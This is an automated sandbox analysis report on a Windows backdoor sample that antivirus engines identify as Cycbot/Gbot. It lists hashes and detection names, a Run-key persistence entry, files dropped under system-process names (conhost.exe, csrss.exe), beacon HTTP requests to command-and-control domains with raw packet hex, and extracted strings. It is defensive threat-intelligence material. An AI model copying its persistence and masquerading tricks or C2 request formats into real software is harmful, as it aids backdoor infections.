Analysis Date2014-12-19 16:56:25
MD51e6e9a173550017ea0aba98a255eb960
SHA1f6543e17d0b08d17c196b1e4630fe15475c8224b

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 6197253569000ef2636a058b04f92a91 sha1: 9bd07cd81433eb4fd6432e4c6ce1ea9a95d6f994 size: 105984
Section.rdata md5: a68ff4ef97fa171610bacfe645ed46ef sha1: 6345056c5528e4bd9802148e37b873787b4db7b2 size: 1024
Section.data md5: d2d39712c202fbbc1cddb46b26287fa2 sha1: a4d81f547d43e24e8167ef6cb17180e0cab39456 size: 70144
Section.reloc md5: 4a9e6d13b2b960d50e1bcbf951ada207 sha1: 23f117e30c37799fb14e8e658d46276f8fc2a263 size: 1024
Timestamp2005-11-26 07:59:00
PEhash3e041bf39703d2d6945cc0cc07b96c996f085821
IMPhash06a9d0c73a32942ddb8292199f42057a
AV360 SafeGen:Heur.Conjar.5
AVAd-AwareGen:Heur.Conjar.5
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)Gen:Heur.Conjar.5
AVAuthentiumW32/Goolbot.K.gen!Eldorado
AVAvira (antivir)TR/Crypt.ZPACK.Gen
AVBullGuardGen:Heur.Conjar.5
AVCA (E-Trust Ino)Win32/Cycbot.G!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Gbot-1367
AVDr. WebBackDoor.Gbot.73 - infected, incurable
AVEmsisoftGen:Heur.Conjar.5
AVEset (nod32)Win32/Kryptik.TFW
AVFortinetW32/Kryptik.SMY!tr.bdr
AVFrisk (f-prot)W32/Goolbot.K.gen!Eldorado
AVF-SecureRogue:W32/OpenCloud.A
AVGrisoft (avg)Win32/Cryptor
AVIkarusBackdoor.Win32.Cycbot
AVK7Backdoor ( 003210941 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesBackdoor.Bot
AVMcafeeBackDoor-EXI.gen.n
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Heur.Conjar.5
AVRisingBackdoor.Win32.Cycbot.a
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Cycbot!gen7
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)SScope.Malware-Cryptor.Maxplus.0997

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex{5A92A751-F926-4BB9-872E-BEC4A4CD571F}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS127.0.0.1
Winsock DNShealthylifenow.com
Winsock DNSyourmediaresources.com
Winsock DNSonlinesearchdb.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNShealthylifenow.com
Type: A
208.109.208.147
DNSzonedg.com
Type: A
141.8.225.80
DNSzonedg.com
Type: A
141.8.225.80
DNSyourblogresources.com
Type: A
DNSonlinesearchdb.com
Type: A
DNSyourmediaresources.com
Type: A
HTTP GEThttp://healthylifenow.com/templates/7349/images/header_logo.jpg?v87=49&tq=gJ4WK%2FSUh7TFkER8oY%2BQtMWTUj26kJH7yZJSPbqVybhqtUn5CGFATA%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1031 ➝ 208.109.208.147:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f74656d 706c6174 65732f37   GET /templates/7
0x00000010 (00016)   3334392f 696d6167 65732f68 65616465   349/images/heade
0x00000020 (00032)   725f6c6f 676f2e6a 70673f76 38373d34   r_logo.jpg?v87=4
0x00000030 (00048)   39267471 3d674a34 574b2532 46535568   9&tq=gJ4WK%2FSUh
0x00000040 (00064)   3754466b 4552386f 59253242 51744d57   7TFkER8oY%2BQtMW
0x00000050 (00080)   54556a32 366b4a48 37795a4a 53506271   TUj26kJH7yZJSPbq
0x00000060 (00096)   56796268 7174556e 35434746 41544125   VybhqtUn5CGFATA%
0x00000070 (00112)   33442533 44204854 54502f31 2e300d0a   3D%3D HTTP/1.0..
0x00000080 (00128)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000090 (00144)   650d0a48 6f73743a 20686561 6c746879   e..Host: healthy
0x000000a0 (00160)   6c696665 6e6f772e 636f6d0d 0a416363   lifenow.com..Acc
0x000000b0 (00176)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x000000c0 (00192)   67656e74 3a206d6f 7a696c6c 612f322e   gent: mozilla/2.
0x000000d0 (00208)   300d0a0d 0a                           0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42384f6f 59764561 53505425   ij%2B8OoYvEaSPT%
0x000000c0 (00192)   32427371 6c537225 32466525 32425635   2BsqlSr%2Fe%2BV5
0x000000d0 (00208)   5a755267 25334425 33442048 5454502f   ZuRg%3D%3D HTTP/
0x000000e0 (00224)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000f0 (00240)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x00000100 (00256)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000130 (00304)   6c6f7365 0d0a0d0a                     lose....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 4238796a 59764561 53505425   ij%2B8yjYvEaSPT%
0x000000c0 (00192)   32427371 74537225 32466525 32425635   2BsqtSr%2Fe%2BV5
0x000000d0 (00208)   5a755267 25334425 33442048 5454502f   ZuRg%3D%3D HTTP/
0x000000e0 (00224)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000f0 (00240)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x00000100 (00256)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000130 (00304)   6c6f7365 0d0a0d0a 20737563 68206669   lose.... such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings
.
@.
....
a../
.F
@y@@
.

080904b0
1.0.0.1
1508
FileVersion
&find
&Find any        Alt+F
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
^^^^^^
^^^^^}}}}}}}}}}}}}}
<<<<<<<<<<<<<<<<<
==~~~~~
======================
__________
---------
--------*****
,,,,,,,
::::::::::
???????
......
........
...........
"`@~<}
"""""""
"""""""""
((((((((((((((((((
]]::::::::::
}}}}}}
}}}}}}}}
}}}}}}}}}
@-$`@~
$$$$$$$$$
**************
&&&&&&&&&
#######
%%%%%%%%%%
+?	\+ 
++++++++
++++++++++++
			||||
			////////
									
0000000]]]]
^^^^^^^^^^^^000000000000000
000dddd
07K( @~
 0^d1V
"``0_h
0!pWB:
11_0iFF|`?
1m`^+0,
1r8L^}
,` 1ri
]2]6In
. `;27
2888888wwwwwww
?\!2pYYp
-2SNu$`
31Qqqnz
333WWW
3.a8mU
}3*jng
.3-[)m<
3Mp{+p
3~. `n=
}3n n@
4;]`3f
((((((444444444
4F?8oz
4i+D1(
[]4>K;A
5555>>>>>>
55555555&&&&#
5e"OLl
;5F)Cj
5._H5&
=5(KJo
5oN<1K
5}Sydd
5tzAqp_dz
5*yr"|
6     
613h+_
,@6_3T
66666666
666666666
66666SS008
^{6FVv
6iK'!v3<
6{vXES=
@@6w( @
71C#d4:?
:76~LV"
774K#3%
777777
8<b{m"
,8GFe3
8gHcPVZ
8 NS)!
@8`TM+
 `8TZv
999======
99999999999999999
:9Ao#61
{9jf%|
 `9Klt
9.>R9/
@A=0|-
A0g\:3q,
AAAAAA
aaaaaaaaaaaaaa
A"aZJ}R#
AcaeXO
Ahsa41
.;ANsO
as)>;S
/aW^v~
A/zonn
B0K?B)
ba8+n&
BBBBBBB
bbbbbbbbbbb
BBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
` b-G:
@"`@~b;mZ
^boG><
b\;RA:
Bt&PFWN
BuHZu|
;bY/IY
CCCCCCChhh
CEGl2N4
 cigBZ
ClipCursor
Co8, `
_%>c^p
CRcU/x
CreatePopupMenu
CrUUUUUU
c> `@w
Cz6]fq
@.data
DDDDDD
dddddddAAAAAA
DDDDDDDDyyyyy
DDDDDDttttttttQQQQQ
dd^^++++++++gggg
dd+|w2
DestroyMenu
]\D`j{
	@Dj|r
>D;"#O
.dOY{	U
d{QX!-)%
dTK=)5
+Du.`@
DuplicateHandle
Du &,y
DveM!( 
DwR"+taTL
!DyH|%
` e*  
E	0VRk
ea1w#c
__EEEEEE
eFe||+(
. `EI[
EnumResourceNamesW
eq_cKB
=Ez@'.
ffffff
`F[G  `
FindClose
FindFirstFileA
FindResourceExA
FindWindowA
FlushInstructionCache
#f&` M
fU0h.j'
FW5,`@
,  Fx"
` FYOX
f(zU*F
;G1pdp
Gb?< `
g:EENa
GetDesktopWindow
GetModuleFileNameW
G -fdi
##GGG@@@@
gggggg
gJ-yZm
gl5?v`
GN1v	-
/GPHSp
GPPKrk
GQi4	'
g`r+n=
G{U`%B
GYHi)U
{GY$)q
H$@` `
H:D>2J
 HfTY9AQ
HFV, `
HGvuO?
Hn=:==
:hvGuN
Hz{[6n
"`@i4c
i	5\HU.\
`@I7v1
iCNc-e
IFeM1e
-IFT>JM
[[[[[II9
IIIIIIII
iiiiiiiii
IIIIIIIIIIIIIIII
IIIIIIIxxx
IIIwwwwww
IkT@szxo
:@IlA)
`@%i\NaSe
i]nCfZ
[Ix^2u
*` j0^
J=3Dz+^6h
j3	t>T
 @})J4J
?jC9cA
JJ"""""""
JJJJJJ
JJJJJJ:::::::
jjjjjjjjj________
!jL*y&[
jNUzvPID
JTu)5!k
----------K
k ;(1s
K(  4Wy?
KERNEL32.dll
kITOpn1rNf
KKKKKKK
kkkkkkkk
kkkt(((((
Kl)y~o
@K?Ml;
kppppppppll;
K}R<<}
?K;Z7I"
@ l$@ 
*` 	l/
l\b) @
Lddddddd
 `"  LE
ljMy'69=$
L<}k9f=B
lkXx4Sm
(((((((lllllll
`@L[nw
	LQ64d.
:L_Tkaj7iq
lv8My!H
@`+LVC
>\>m{%
!,M?\?
MapViewOfFile
`mG7<.
MIlb>|
+ml~ 0
mm_<kW
mmmmmmmm
MMMMMMMMMMMM
MMMMYYY8777777777777777
 mNG'_P;]
 n{#@;
NdrComplexArrayFree
'nG%vt
nkds<y7lU
;NkK$` A<
nnnnnnnn
nnnnnnnnn
NNNNNNNNN
nnnnnnnnnnn'
NNNNNNNNNNN
}}}}}}}}}nnnnnnnnnnnnn
NNNNNNNNNNNNNNNNNNNNYYY@@@zz
nP>2kr
nRRRRRRR
nt.8qY
NX^x{!M
/o6[gc
oDt|.`
~ok8%S
OOOO__
OOOOOOOOOOOO
ooooooooooooo
OPU#-K
O<V,` 
?Ov>6O
*`@ozva
"` p& 
p:::::::
pa8[]X3
>\pDNr<zF
P!dWq.
p^e. `
p}F>^*
p-G_|	
/P;-ghl
=Ph$<8(?7
pjS]v_
@Po>Wj
|||||||PP
::::PPPPPP
PPPPPPPPP
PPPPPPPPPPP
PPPPPPPPPPPPPPP
+p=Vam
``p~yT
=^_\Q|
?  @Q49
q4IP}?
	Q^9]0n
Q@iog$
Q%N~&7
Qnlf;<
?_qOb	l*89
qqbbbbb
.q\Qf&:
,,,,,,QQQQQQQQ
]q^U\Z
qVp<Kx
r~~~~~
@ R2h+
@r2K@R={
|r8.H'y
`rb( @
RB}n  `
`.rdata
RedrawWindow
.reloc
~r{hso
 @~R!k 
RPCRT4.dll
r"`@RG=
rrr99999999999
rrrrrr
RRRRRRRRRRR))
RRRRVVVVVVVV
RS*@`{
 `rsL,
RtA[(`@|
@ R$` w9
rwETbj
rW	Y9|^
Sbbbbbbb
?Sd5yltO
SetEnvironmentVariableW
SHELL32.dll
Shell_NotifyIconA
@S![Mq6
sssssAAAA
/	S%vu
;s?Y|)
}s[Yy5NA
TD0x%a
!This program cannot be run in DOS mode.
timeEndPeriod
tnnnnnnn8888
TQ?iA]
TrackPopupMenuEx
TS[C(a
TT					
/&tUPW
%\U6	.
u"%eX_
`@U;fK
+uMAvU
UnmapViewOfFile
u-P4w0
USER32
/u~tQHfk
UuidCreate
UUUUUUUUUUUUUUUUUUUUU
uuuuuZJJJJJJJJJJJJJ
Ux^Ss<
ux)$zI
u[YyD]
/v5ErH
#V_6Ky
\V/f8?)
^VJMagG3
VJR-E>
vml"``
`/|vMlD&
Vtx'0)
 \W(_1
$wBO/7
 wHhh8
WINMM.dll
wl?tI/n8(
W@N_P!
W>NW& 
w`Q!T>
W(S~!^p>(c:
wwEEEO
wwwwwwwww
wwwwwwwwwwwwww
 wwwwwwwwwwwwwwww
@ X;0r 
Xf; @ U
]XG8C%
	\<Xl7
X))))mmmmmmmmmmmmmm
>XSxpFIp
<<XX+++
******XXXXXXXXgggggggg######
XXXXXXXXXX
 @Y2o4
`@Y3>o
``'Y8n
#Y9^`C.
@ `}yA
>yg3IU
y[Md)7Ut"
^;Y!n1x
y(qb;v
 `@Y*``T
yUUUUUUH
]Yx[5_F
yYGL~k
YYYYYYYYYYYYY
.yZ{Zz
]Z7OQ`
]Zbh79
z_eWE7
Zfiimo%
ZGf#T	1S
zjtYK*
<%Z'Mc
zYTtkUM